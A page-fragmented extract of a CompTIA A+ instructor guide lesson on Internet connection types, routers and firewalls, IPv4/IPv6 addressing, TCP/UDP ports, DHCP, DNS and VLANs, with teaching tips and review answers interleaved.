LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 5
Configuring Network Addressing
and Internet Connections
1
LESSON INTRODUCTION
Network cabling, wireless radios, and devices such as switches and APs are used Show
to implement local networks at the hardware level. A local-only network has Slide(s)
limited uses, however. The full functionality of networking is only realized when Objectives
local networks join wide area networks, such as the Internet. This requires modem
devices and radio antennas that can communicate over the cabling and wireless Teaching
media types used by Internet service providers (ISPs). It also requires technologies Tip
that can identify each network and forward data between them. This network With LAN cabling and
addressing and forwarding function is performed by router devices and the Internet hardware covered, this
Protocol (IP). lesson moves on to
Internet connectivity,
This lesson will help you to compare the technologies that underpin Internet access routing, network
and to configure the main protocols in the Transport Control Protocol/Internet addressing (IP, DHCP,
Protocol (TCP/IP) suite that enable communications over an internetwork. and DNS), and TCP/
UDP ports.
Lesson Objectives
In this lesson, you will:
• Compare Internet connection types.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
160 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 5A
Compare Internet Connection Types
2
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 161
Role of a digital modem to connect a local network to an ISP’s network for Internet access.
The modem establishes the physical connection to the WAN interface, but when
interconnecting networks, there must also be a means of identifying each network
and forwarding data between them. This function is performed by a router that
implements the Internet Protocol (IP).
Role of the router and Internet Protocol (IP) in distinguishing logical networks.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
162 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
RJ11 DSL (left) and RJ45 LAN (right) ports on a DSL modem. (Image © 123RF.com.)
A filter (splitter) must be installed to each phone socket to separate voice and data
signals. These can be self-installed on each phone point by the customer. Modern
sockets are likely to feature a built-in splitter.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 163
Cable Modems
A cable Internet connection is usually available as part of a cable access TV (CATV) Show
service. A CATV network is often described as hybrid fiber coax (HFC), as it combines Slide(s)
a fiber optic core network with copper coaxial cable links to customer premises Cable Modems
equipment. It can also be described as broadband cable or just as cable. Cable
based on the Data Over Cable Service Interface Specification (DOCSIS) supports Teaching
downlink speeds of up to 38 Mbps (North America) or 50 Mbps (Europe) and uplinks Tip
of up to 27 Mbps. DOCSIS version 3 allows the use of multiplexed channels to Explain that where the
achieve higher bandwidth. PSTN was established
by phone companies,
Installation of a cable modem follows the same general principles as for a DSL other national
modem. The cable modem is interfaced to the local router via an RJ45 port and telecommunications
with the access provider’s network by a short segment of coax terminated using networks were created
threaded F-type connectors. More coax then links all the premises in a street with a to provision cable
cable modem termination system (CMTS), which forwards data traffic via the fiber access TV. A cable
backbone to the ISP’s point of presence and from there to the internet. modem performs the
same sort of function
as a DSL modem but
over coax rather than
two-pair copper.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
164 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
A cable modem: The RJ45 port connects to the local network router, while the coax port connects to
the service provider network. (Image © 123RF.com.)
DSL modems are not interchangeable. An ADSL modem is unlikely to support VDSL,
though most VDSL modems support ADSL.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 165
(OLT) located in a street cabinet. From the OLT, splitters direct each subscriber’s
traffic over a shorter length of fiber to an optical network terminal (ONT)
installed at the customer’s premises. The ONT converts the optical signal to an
electrical one. The ONT is connected to the customer’s router using an RJ45 copper
wire patch cord.
Optical network terminal—the PON port terminates the external fiber cable and the LAN ports
connect to local routers or computers over RJ45 patch cords. (Image by artush © 123RF.com)
RTT is the two-way latency, or the time taken for a probe to be sent and a response to
be received.
To create a satellite internet connection, the ISP installs a very small aperture
terminal (VSAT) satellite dish antenna at the customer’s premises and aligns it with
the orbital satellite. The satellites are in high geostationary orbit above the equator,
so in the northern hemisphere, the dish will be pointing south. Because the satellite
does not move relative to the dish, there should be no need for any realignment.
The antenna is connected via coaxial cabling to a Digital Video Broadcast Satellite
(DVB-S) modem.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
166 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
All types of microwave radio link can be adversely affected by snow, rain, and high winds.
3G
A 3G cellular radio makes a connection to the closest base station. The area served
by each base station is referred to as a “cell.” Cells can have an effective range of
up to 5 miles (8 km), though signals can be obstructed by building materials. A 3G
cellular radio typically works in the 850 and 1,900 MHz frequency bands (mostly in
the Americas) and the 900 and 1,800 MHz bands (rest of the world). These lower
frequency waves do not need so much power to propagate over long distances.
With 3G cellular, there are two competing formats, established in different markets:
• Global System for Mobile Communication (GSM)-based phones. GSM allows
subscribers to use a removable subscriber identity module (SIM) card to use an
unlocked handset with their chosen network provider.
4G
Long-Term Evolution (LTE) is a series of converged 4G standards supported by both
the GSM and CDMA network providers. LTE devices must have a SIM card issued by
the network provider installed.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 167
5G
The 5G standard uses different spectrum bands from low (sub-6 GHz) to medium/high
(20–60 GHz). Low bands have greater range and penetrating power; high bands, also
referred to as millimeter wave (mmWave), require close range (a few hundred feet) and
cannot penetrate walls or windows. Consequently, design and rollout of 5G services is
relatively complex. Rather than a single large antenna serving a wide area wireless cell,
5G involves installing many smaller antennas to form an array that can take advantage
of multipath and beamforming to overcome the propagation limitations of the spectrum.
This technology is referred to as massive multiple input multiple output (MIMO).
As well as faster speeds for mobile device internet connections, 4G and 5G can be
used as a fixed-access wireless broadband solution for homes and businesses and
to support IoT networks.
Routers
The devices discussed so far enable physical links where the only type of addressing Show
used identifies a host hardware interface: Slide(s)
Ethernet switches and Wi-Fi access points forward frames using MAC addresses. Routers
A network segment is where hosts can send frames to one another using their
MAC addresses. Teaching
Tip
Digital modems, ONTs, and cellular radios transmit data over DSL, cable, fiber,
Note that a SOHO
satellite, and cellular links to connect a local network or device to an ISP. This is “router” is called that
typically a point-to-point link and so does not require unique interface addressing. because routing is
its most advanced
These network segments use different media types and have no physical or logical function. The same
means of communicating with one another. When you want to connect a local multifunctional device
network to the internet, you need to use a protocol that can distinguish between also includes a switch,
the private LAN and public WAN and an intermediate system with interfaces in both access point, and
networks. The protocol used to implement this is the Internet Protocol (IP), and the modem.
intermediate system is a router. Enterprise routers
typically come in two
types: WAN/edge and
LAN/internal. Edge
routers serve a similar
purpose to SOHO
routers (connect to
the Internet and to
enterprise WANs),
while internal routers
help to divide large
networks into
separate subnetworks
and zones for
performance and
security purposes.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
168 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
There are several types of routers and different uses for them. A SOHO router often
simply routes between its local network interface and its WAN/Internet interface.
An enterprise network is likely to use different router models to perform different
routing tasks:
• A LAN router divides a single physical network into multiple logical subnetworks.
Each logical network becomes a separate broadcast domain. Having too many
hosts in the same broadcast domain reduces performance. There is also a security
benefit because traffic passing from one logical network to another can be subject
to filtering rules. This type of router generally has only Ethernet interfaces.
• A WAN or border router forwards traffic to and from the Internet or over a
private WAN link. This type of router has an Ethernet interface for the local
network and a digital modem interface for the WAN.
Firewalls
Show Once you have joined public and private networks using a router, you then need
Slide(s) to control which computers are allowed to connect to them and which types of
Firewalls traffic you will accept. The role of filtering allowed and denied hosts and protocols is
performed by a network firewall. A basic firewall is configured with rules, referred
Teaching to as a network access control list (ACL). Each entry in the ACL lists source and/or
Tip destination network addresses and protocol types and whether to allow or block
Make sure students traffic that matches the rule.
understand the basic
Firewalls can also be deployed within a private network. For example, you might
purpose of a firewall
and general options only want certain clients to connect to a particular group of servers. You could place
for implementing one. the servers behind a local network firewall to enforce the relevant ACL.
Most routers can implement some level of firewall functionality. A firewall can be
implemented as a standalone appliance. These dedicated appliances can perform
deeper analysis of application protocol data and use more sophisticated rules to
determine what traffic is allowed. They are often implemented as unified threat
management (UTM) appliances to perform multiple other security functions.
There are also personal or software firewalls. These are installed to a single computer
rather than working to protect a network segment.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 169
Review Activity:
Internet Connection Types
3
An RJ45 unshielded twisted pair (UTP) patch cable. The ONT converts the optical
signal over the external fiber optic cable to an electrical one to connect to the
local router.
3. True or false? Both 4G and 5G cellular can be used for fixed access
broadband as well as in mobile devices.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
170 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 5B
Use Basic TCP/IP Concepts
5
TCP/IP model.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 171
Internet Layer
The Internet Protocol (IP) provides packet addressing and routing within a
network of networks. A PC, laptop, mobile device, or server that can communicate
on an IP network is generically referred to as an “end system host.” For data to be
sent from one IP network to another, it must be forwarded by an intermediate
system (a router). When IP is being used with a physical/data link specification,
such as Ethernet or Wi-Fi, there must be a mechanism to deliver messages from IP
at the Internet layer to host interfaces addressed at the Link layer. This function is
performed by the Address Resolution Protocol (ARP), which allows a host to query
which MAC address is associated with an IP address.IP provides best effort delivery
that is unreliable and connectionless. A packet might be lost, delivered out of
sequence, duplicated, or delayed.
Transport Layer
Where the network layer deals with addressing, the Transport layer determines how
each host manages multiple connections for different application layer protocols
at the same time. The transport layer is implemented by one of two protocols:
Transmission Control Protocol (TCP) guarantees connection-oriented forwarding
of packets. TCP can identify and recover from lost or out-of-order packets,
mitigating the inherent unreliability of IP. This is used by most TCP/IP application
protocols, as failing to receive a packet or processing it incorrectly can cause serious
data errors. User Datagram Protocol (UDP) provides unreliable, connectionless
forwarding. UDP is faster and comes with less of a transmission overhead because
it does not need to send extra information to establish reliable connections. It is
used in time-sensitive applications, such as speech or video, where a few missing or
out-of-order packets can be tolerated. Rather than causing the application to crash,
they would just manifest as a glitch in video or a squeak in audio.
Application Layer
The Application layer contains protocols that perform some high-level function,
rather than simply addressing hosts and transporting data. There are numerous
application protocols in the TCP/IP suite. These used to configure and manage
network hosts and to operate services, such as the web and email. Each application
protocol uses a TCP or UDP port to allow a client to connect to a server.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
172 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
IPv4 Addressing
Show The core protocol in TCP/IP is the Internet Protocol (IP), which provides network
Slide(s) and host addressing and packet forwarding between networks. An IP packet adds
IPv4 Addressing some headers to whatever transport/application layer data it is carrying in its
payload. Two of the most important header fields are the source and destination
Teaching IP address fields.There are two versions of IP: IPv4 and IPv6. An IPv4 address is
Tip 32 bits long. In its raw form it appears as 11000000101010000000000
Explain dotted decimal
000000001. The 32 bits can be arranged into four groups of eight bits (one
format. byte) known as “octets.” The above IP address could therefore be rearranged as
11000000 10101000 00000000 00000001. This representation
Interaction of an IP address is difficult for a human to memorize or to enter correctly into
Opportunity configuration dialogs. To make IP addresses easier to use, they are used in dotted
Optionally, show how
decimal notation. This notation requires each octet to be converted to a decimal
to convert between value. The decimal numbers are separated using a period. Converting the previous
binary and digital number to this notation gives 192.168.0.1
using the columnar
method. For example,
in the first octet,
the decimal value is
128+64+0+0+0+0+0+0;
in the second octet,
the conversion is
128+0+32+0+8+0+0+0.
If all the bits in an octet are set to 1, the number obtained is 255 (the maximum
possible value). Similarly, if all the bits are set to 0, the number obtained is 0 (the
minimum possible value). Therefore, theoretically an IPv4 address may be any value
between 0.0.0.0 and 255.255.255.255. However, some addresses are not permitted
or are reserved for special use.
Network Prefixes
Show An IPv4 address provides two pieces of information encoded within the same value:
Slide(s) • The network number (network ID) is common to all hosts on the same IP network.
Network Prefixes
• The host number (host ID) identifies a host within a particular IP network.
Teaching
These two components within a single IP address are distinguished by combining
Tip
the address with a network prefix. A prefix is a 32-bit value with a given number of
Show how the network contiguous bits all set to 1. For example, a prefix with 24 bits is the following binary
prefix/subnet mask is
used to segment the
value: 11111111 11111111 11111111 00000000.
address into network This can be written in slash notation in the form /24. The prefix can also be
ID and host ID
expressed in dotted decimal as a subnet mask: 255.255.255.0
portions, using whole
octets to keep the
examples simple.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 173
The name “subnet mask” comes about because a single IP network can be divided into
multiple logical subnetworks (subnets) using this method.
When combined with an IP address, the prefix masks the host ID portion to reveal
the network ID portion. Where there is a binary 1 in the prefix, the corresponding
binary digit in the IP address is part of the network ID.
Slash notation is used to refer to network IDs, while the subnet mask is typically used in
host configuration dialogs. For example, 192.168.0.0/24 refers to an IP network, while
192.168.0.1/255.255.255.0 refers to a host address on that IP network.
IPv4 Forwarding
When a host attempts to send a packet via IPv4, the protocol compares the source Show
and destination IP address in the packet against the sending host’s subnet mask. Slide(s)
If the masked portions of the source and destination IP addresses match, then IPv4 Forwarding
the destination interface is assumed to be on the same IP network or subnet.
For example:
In the example, the host will determine that the destination IPv4 address is on the
same IP network (192.168.0.0/24) and try to deliver the packet locally. On Ethernet,
the host would use the address resolution protocol (ARP) to identify the MAC
address associated with the destination IP address.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
174 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Teaching If the masked portion does not match, the host assumes that the packet must be
Tip routed to another IP network. For example:
Point out that the
source and destination
hosts can have the
same host ID because
they are on different
networks.
In this case, the source host 192.168.0.100 identifies that the destination IPv4
address is on a different IP network (192.168.1.0/24). Consequently, it forwards the
packet to a router rather than trying to deliver it locally. Most hosts are configured
with a default gateway parameter. The default gateway is the IP address of a
router interface that the host can use to forward packets to other networks. The
default gateway must be in the same IP network as the host.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 175
Dotted Decimal
Class Mask Network Prefix Binary Mask
A 255.0.0.0 /8 11111111
00000000
00000000
00000000
B 255.255.0.0 /16 11111111
11111111
00000000
00000000
C 255.255.255.0 /24 11111111
11111111
11111111
00000000
• Through a proxy server that fulfills requests for Internet resources on behalf
of clients.
Show
Slide(s)
IPv4 Host Address Configuration
IPv4 Host Address
Each host must be configured with an IP address and subnet mask at a minimum Configuration
to communicate on an IPv4 network. This minimum configuration will not prove
Teaching
very usable, however. Several other parameters must be configured for a host to
Tip
make full use of a modern network or the Internet. There are also different ways to
supply this configuration information to hosts. List the parameters
that must be
An IPv4 address and subnet mask can be set manually in a static configuration: configured for a host
to have a valid IP
• The IPv4 address is entered as four decimal numbers separated by periods, such configuration. Explain
as 192.168.0.100. that the default
gateway parameter
• The subnet mask is entered in dotted decimal notation, such as is typically the LAN IP
255.255.255.0. When used with the IP address 192.168.0.100, this address of the router.
mask identifies 192.168.0.0 as the network ID and means that the last octet The primary DNS
server address is also
(.100) is the host ID. Alternatively, this parameter might be entered as the usually the same as
mask length in bits. the default gateway.
You might want to
mention using public
DNS resolvers, such
as Google’s 8.8.8.8 or
Quad9 (9.9.9.9).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
176 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Configuring a Windows 10 host to use a static IP address configuration. Note that this dialog
uses a prefix length parameter rather than requiring the subnet mask in dotted decimal format.
(Screenshot courtesy of Microsoft.)
A host cannot be assigned either the first or last address in an IP network. For example,
in the IP network 192.168.0.0/24, 192.168.0.0 is the first address
and is used to identify the network itself. The last address 192.168.0.255 is
used to broadcast to all hosts. Valid host addresses range from 192.168.0.1 to
192.168.0.254.
Two other parameters are typically configured to make the host fully functional:
• The default gateway parameter is the IPv4 address of a router, such as
192.168.0.1. This is the IP address to which packets destined for a remote
network should be sent by default. This setting is not compulsory, but failure to
enter a gateway would limit the host to communication on the local network only.
• One or more Domain Name System (DNS) server IPv4 addresses. These servers
provide resolution of host and domain names to their IP addresses and are
essential for locating resources on the Internet. Most local networks also use
DNS for name resolution. Typically, the primary DNS server address would be
configured as the same as the gateway address. The router would be configured
to forward DNS queries to a secure resolver. Often two DNS server addresses
(preferred and alternate) are specified for redundancy.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 177
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
178 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Other vendors and open-source products use the term “link local” rather than APIPA.
Not all hosts use link-local addressing. Some may just leave IP unconfigured or use the
IP address 0.0.0.0 to indicate that the IPv4 address of the interface is not known.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 179
You can also use the management console to view line status and the system log.
These might be required by the ISP to troubleshoot any issues with the connection.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
180 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
IPv6 Addressing
Show The pool of available IPv4 public addresses is not very large, compared to the
Slide(s) number of devices that need to connect to the Internet. While private addressing
IPv6 Addressing
and NAT provides a workable solution, IP version 6 (IPv6) is intended to replace IPv4
completely, at some point. An IPv6 address is a 128-bit number and so can express
Teaching
exponentially more address values that the 32-bit number used in IPv4.
Tip
IPv6 Notation
Contrast the format
of IPv6 with IPv4. If IPv6 addresses are written in hexadecimal notation. One hex digit can represent a
students ask, explain four-bit binary value (a nibble). To express a 128-bit IPv6 address in hex, the binary
that there is no such
thing as IPv5, as the address is divided into eight double-byte (16-bit) values delimited by colons. For
version field protocol example:
ID “5” was assigned
to another protocol
2001:0db8:0000:0000:0abc:0000:def0:1234
(the Internet Stream To shorten how this is written and typed in configuration dialogs, where a double
Protocol) in the 1970s. byte contains leading zeros, they can be ignored. In addition, one contiguous series
Explain how to check of zeroes can be replaced by a double colon place marker. Thus, the address above
for IPv6 support on a would become
typical SOHO router.
Note that, if it is 2001:db8::abc:0:def0:1234
enabled, clients will
typically prefer IPv6 IPv6 Network Prefixes
to IPv4.
An IPv6 address is divided into two main parts: the first 64 bits are used as a
network ID, while the second 64 bits designate a specific interface.
In IPv6, the interface identifier is always the last 64 bits; the first 64 bits are used
for network addressing.
As the network and host portions are fixed size, there is no need for a subnet mask.
Network addresses are written using prefix notation, where /nn is the length of the
routing prefix in bits. Within the 64-bit network ID, the length of any given network
prefix is used to determine whether two addresses belong to the same IP network.
For example, most ISPs receive allocations of /32 blocks and issue each customer with
a /48 prefix for use on a private network. A /48 block allows the private network to be
configured with up to 65,346 subnets.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 181
While it is possible to configure IPv6 addresses statically, most hosts obtain a global
and link-local address via the local router. This process is referred to as StateLess
Address Auto Configuration (SLAAC). IPv6 hosts do not need to be configured with
a default gateway. IPv6 uses a protocol called Neighbor Discovery (ND). ND is used
to implement SLAAC, allows a host to discover a router, and performs the interface
address querying functions performed by ARP in IPv4.
Dual Stack
While IPv6 is designed to replace IPv4, transitioning from IPv4 has proved
enormously difficult. Consequently, most hosts and routers can operate both IPv4
and IPv6 at the same time. This is referred to as “dual stack.” Typically, a host will
default to attempting to establish an IPv6 connection and fall back to IPv4 if the
destination host does not support IPv6.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
182 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Basic TCP/IP Concepts
6
• 52.165.16.254
• 192.168.100.52
• 169.254.1.121
• 172.30.100.32
• 224.100.100.1
The WAN interface of the router must use an IPv4 address from a valid public range,
so 52.165.16.254 is the only one it could be: 172.30.100.32 and 192.168.100.52 are
in the class B and class C private ranges, 169.254.1.121 is in the range reserved for
APIPA, and 224.100.100.1 is outside the range of valid public addresses (it is part of
class D, which is used for a type of addressing called “multicasting”).
5. True or false? A valid IPv6 configuration does not require a subnet mask.
True. In IPv6, the host ID portion of the address is always the last 64 bits. The
network prefix length is used to determine which network a host is on, but a mask
is not required.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 183
Topic 5C
Compare Protocols and Ports
6
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
184 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
In fact, each host assigns two port numbers. On the client, the destination port number
is mapped to the service that the client is requesting (HTTP on port 80, for instance). The
client also assigns a random source port number (47747, for instance). The server uses
this client-assigned port number (47747) as the destination port number for its replies
and its application port number (80 for HTTP) as its source port. This allows the hosts to
track multiple “conversations” for the same application protocol.
In the TCP/IP suite, two different protocols implement this port assignment
function: TCP and UDP.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 185
TCP is used when the application protocol cannot tolerate missing or damaged
information. For example, the following application protocols must use TCP:
• HyperText Transfer Protocol (HTTP)/HyperText Transfer Protocol Secure
(HTTPS)—This protocol is used to deliver web pages and other resources. The
secure version uses encryption to authenticate the server and protect the
information that is being transmitted. A single missing packet would cause this
process to fail completely.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
186 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Well-Known Ports
Show Server port numbers are assigned by the Internet Assigned Numbers Authority
Slide(s) (IANA). Some of the “well-known” port numbers and the functions of the application
protocols they represent are listed in the following table.
Teaching
Port# TCP/UDP Protocol Purpose
Tip
This page summarizes 20 TCP File Transfer Protocol Make files available
the ports and (FTP)—Data connection for download across
protocol purposes a network (data
that students need connection port)
to memorize. Explain
that we will be 21 TCP File Transfer Protocol Make files available for
covering each protocol (FTP)—Control download across
in more detail in the connection a network (control
next topic and in connection port)
lesson 6.
22 TCP Secure Shell (SSH) Make a secure
connection to the
command-line interface
of a server
23 TCP Telnet Make an unsecure
connection to the
command-line interface
of a server
25 TCP Simple Mail Transfer Transfer email messages
Protocol (SMTP) across a network
53 TCP/UDP Domain Name Facilitate identification
System (DNS) of hosts by name
alongside IP addressing
67 UDP Dynamic Host Provision an IP address
Configuration configuration to clients
Protocol (DHCP)
Server
68 UDP DHCP Client Request a dynamic IP
address configuration
from a server
80 TCP HyperText Transfer Provision unsecure
Protocol (HTTP) websites and web
services
110 TCP Post Office Protocol Retrieve email messages
(POP) from a server mailbox
137–139 UDP/TCP NetBIOS over TCP/IP Support networking
features of legacy
Windows versions
143 TCP Internet Mail Access Read and manage mail
Protocol (IMAP) messages on a server
mailbox
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 187
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
188 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Protocols and Ports
7
Port TCP/25 is used by the Simple Mail Transfer Protocol (SMTP) to send and receive
email messages. Port TCP/3389 is used by Remote Desktop Protocol (RDP) to
connect to a computer’s graphical shell over the network.
4. The technician has made a note to check that port 445 is blocked by
the firewall. What is the purpose of the protocol that uses this port by
default, and why should it be blocked?
Port TCP/445 is used by the Server Message Block (SMB) protocol that implements
Windows File/Printer Sharing. SMB is designed for use on local networks only.
Allowing access from the Internet would be a security risk.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 189
Topic 5D
Compare Network Configuration
Concepts
5
DHCP Leases
A host is configured to use DHCP by specifying in its TCP/IP configuration that
it should automatically obtain an IP address. When a DHCP client initializes, it
broadcasts a DHCPDISCOVER packet to find a DHCP server. All communications are
sent using UDP, with the server listening on port 67 and the client on port 68.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
190 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The DHCP client communicates with the server using broadcast communications so
there is no need to configure a DHCP server address in the client configuration. The
DHCP server must be configured with a static IP address.
Presuming it has an IP address available, the DHCP server responds to the client
with a DHCPOFFER packet, containing the address and other configuration
information, such as default gateway and DNS server addresses. The client may
choose to accept the offer using a DHCPREQUEST packet that is also broadcast onto
the network.
Assuming the offer is still available, the server will respond with a DHCPACK packet. The
client broadcasts an ARP message to check that the address is unused. If so, it will start
to use the address and options; if not, it declines the address and requests a new one.
The IP address is leased by the server for a limited period only. A client can attempt
to renew or rebind the lease before it expires. If the lease cannot be renewed, the
client must release the IP address and start the discovery process again.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 191
If the address information needs to change, this can be done on the DHCP server,
and clients will update themselves automatically when they seek a new lease (or a
new lease can be requested manually).
DHCP Reservations
It is often useful for a host to use the same IP address. Servers, routers, printers,
and other network infrastructure can be easier to manage if their IP addresses
are known. One option is to use static addressing for these appliances, but this is
difficult to implement. Another option is to configure the DHCP server to reserve
a particular IP address for each device. The DHCP server is configured with a list
of the MAC addresses of hosts that should receive the same IP address. When it is
contacted by a host with one of the listed MAC addresses, it issues a lease for the
reserved IP address.
Some operating systems send a different unique identifier than a MAC address by
default. The identification method should be configured appropriately on the client so
that the server has the correct information.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
192 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Each FQDN reflects this hierarchy, from most specific on the left (the host
name) to least specific on the right (the TLD followed by the root). For example:
pc.corp.515support.com.
DNS Queries
Show To resolve a host name or FQDN to an IP address, the client must obtain the
Slide(s) appropriate record from a DNS server. For example, a user might type an FQDN
DNS Queries
into the address bar of a web browser client application. The client app, referred to
as a “stub resolver,” checks its local cache for the mapping. If no mapping is found,
Teaching it forwards the query to its local DNS server. The IP addresses of one or more DNS
Tip servers that can act as resolvers are usually set in the TCP/IP configuration. The
client communicates with a DNS server over port 53. The resolution process then
Contrast the function
of DNS servers
takes place as follows:
configured to host
records (name servers)
with those configured
to resolve or forward
client lookup queries.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 193
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
194 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 195
Virtual LANs
All hosts connected to the same unmanaged switch are said to be in the same Show
broadcast domain. This does not present any problem on a small network. Slide(s)
However, the switching fabric on an enterprise network can provide thousands Virtual LANs
of ports. Placing hundreds or thousands of hosts in the same broadcast domain
reduces performance. To mitigate this, the ports can be divided into groups using a Teaching
feature of managed switches called virtual LAN (VLAN). Tip
The simplest means of assigning a node to a VLAN is by configuring the port Explain that VLANs
interface on the switch with a VLAN ID in the range 2 to 4094. For example, switch are configured on
switches to divide a
ports 1 through 10 could be configured as a VLAN with the ID 10 and ports 11
large local network
through 20 could be assigned to VLAN 20. Host A connected to port 2 would be in into multiple
VLAN 10, and host B connected to port 12 would be in VLAN 20. segments (or
broadcast domains).
Each segment is
associated with a
separate subnet, and
traffic between these
subnets must go via
routers and be subject
to network ACLs.
Cumulus VX switch output showing switch ports swp 5–8 configured in VLAN 100 and ports
9–12 in VLAN 200.
The VLAN with ID 1 is referred to as the “default VLAN.” Unless configured differently, all
ports on a managed switch default to being in VLAN 1.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
196 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
When hosts are placed in separate VLANs, they can no longer communicate with
one another directly, even though they might be connected to the same switch.
Each VLAN must be configured with its own subnet address and IP address range.
Communications between VLANs must go through an IP router. Each VLAN must
also be provisioned with its own DHCP and DNS services.
As well as reducing the impact of excessive broadcast traffic, from a security point
of view, each VLAN can represent a separate zone. Traffic passing between VLANs
can easily be filtered and monitored to ensure it meets security policies. VLANs are
